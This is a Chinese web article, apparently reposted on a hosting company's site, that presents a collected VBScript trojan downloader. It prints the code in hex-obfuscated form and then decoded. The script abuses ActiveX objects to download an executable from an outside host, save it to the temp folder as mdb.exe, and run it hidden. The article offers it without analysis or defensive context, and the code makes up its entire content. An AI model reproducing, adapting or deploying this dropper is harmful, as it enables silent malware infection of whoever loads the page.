快速业务通道

一个收集的下载木马并运行的VBS代码

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09
<scriptlanguage="VBScript">
S="2020206F6E206572726F7220726573756D65206E6578740D0A737
3733D226D64622E657865220D0A61613D226F62220D0A6161613D22
6A65220D0A616161613D226374220D0A61616161613D22636C61220
D0A6161616161613D2273736964220D0A616161616161613D22636C
73220D0A61616161616161613D2269643A42443936220D0A6161616
161616161613D22433535362D3635220D0A61616161616161616161
3D2241332D313144220D0A61616161616161616161613D22302D393
8220D0A6161616161616161616161613D2233412D30304330344622
0D0A616161616161616161616161613D22433239453336220D0A6D6
D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674
2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220
D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A
626262623D22622E5374220D0A62626262623D227265616D220D0A6
7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22
536372220D0A6363633D22697074220D0A636363633D22696E672E4
6220D0A6363313D22696C6553220D0A636363313D22797374220D0A
63636363313D22656D4F220D0A6363323D22626A220D0A636363323
D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170
220D0A686868683D22706C69220D0A68686868683D2263617469220
D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227
065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203
D20646F63756D656E742E637265617465456C656D656E7428616126
6161612661616161290D0A78787878787878782E7365744174747269
62757465206161616161266161616161612C20616161616161612661
61616161616161266161616161616161612661616161616161616161
26616161616161616161616126616161616161616161616161266161
61616161616161616161610D0A53657420787878787878203D207878
7878787878782E4372656174654F626A656374286D6D266E6E266D6
D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820
3D2078787878787878782E6372656174656F626A6563742862622662
626226626262622662626262622C2222290D0A787878782E74797065
203D20310D0A7878787878782E4F70656E2067672665652674742C20
22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2
E657865222C2046616C73650D0A7878787878782E53656E640D0A78
7878787878783D7373730D0A20202020736574207878787878203D2
078787878787878782E6372656174656F626A6563742863632663636
32663636363266363312663636331266363636331266363322663636
3322C2222290D0A2020202073657420746D70203D2078787878782E
4765745370656369616C466F6C646572283229200D0A202020207878
78787878783D2078787878782E4275696C645061746828746D702C7
8787878787878290D0A20202020787878782E6F70656E0D0A2020202
0787878782E7772697465207878787878782E726573706F6E7365426
F64790D0A20202020787878782E73617665746F66696C65207878787
87878782C320D0A20202020787878782E636C6F73650D0A20202020
73657420717171203D2078787878787878782E6372656174656F626A
65637428686826686868266868686826686868686826686868686868
2C2222290D0A202020207171712E5368656C6C45786563757465207
87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D
="EXECUTE""""":C="&CHR(&H":N=")":DOWHILELEN(S)>1:IFISNUMER
IC(LEFT(S,1))THEND=D&C&LEFT(S,2)&N:S=MID(S,3)ELSED=D&C&LEF
T(S,4)&N:S=MID(S,5)
LOOP:EXECUTED
</script>
解密后:
复制代码 代码如下:

onerrorresumenext
sss="mdb.exe"
aa="ob"
aaa="je"
aaaa="ct"
aaaaa="cla"
aaaaaa="ssid"
aaaaaaa="cls"
aaaaaaaa="id:BD96"
aaaaaaaaa="C556-65"
aaaaaaaaaa="A3-11D"
aaaaaaaaaaa="0-98"
aaaaaaaaaaaa="3A-00C04F"
aaaaaaaaaaaaa="C29E36"
mm="Mic"
nn="ros"
mmnn="oft.X"
nnmm="MLH"
mnmn="TTP"
nm=mn
bb="Ad"
bbb="od"
bbbb="b.St"
bbbbb="ream"
gg="g"
ee="e"
tt="t"
cc="Scr"
ccc="ipt"
cccc="ing.F"
cc1="ileS"
ccc1="yst"
cccc1="emO"
cc2="bj"
ccc2="ect"
hh="She"
hhh="ll.Ap"
hhhh="pli"
hhhhh="cati"
hhhhhh="on"
oo="o"
ooo="pe"
oooo="n"
Setxxxxxxxx=document.createElement(aa&aaa&aaaa)
xxxxxxxx.setAttributeaaaaa&aaaaaa,aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
Setxxxxxx=xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"")
setxxxx=xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
xxxx.type=1
xxxxxx.Opengg&ee&tt,"http://qq.ee28.cn/down/down.exe",False
xxxxxx.Send
xxxxxxx=sss
setxxxxx=xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
settmp=xxxxx.GetSpecialFolder(2)
xxxxxxx=xxxxx.BuildPath(tmp,xxxxxxx)
xxxx.open
xxxx.writexxxxxx.responseBody
xxxx.savetofilexxxxxxx,2
xxxx.close
setqqq=xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
qqq.ShellExecutexxxxxxx,"","",oo&ooo&oooo,0

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号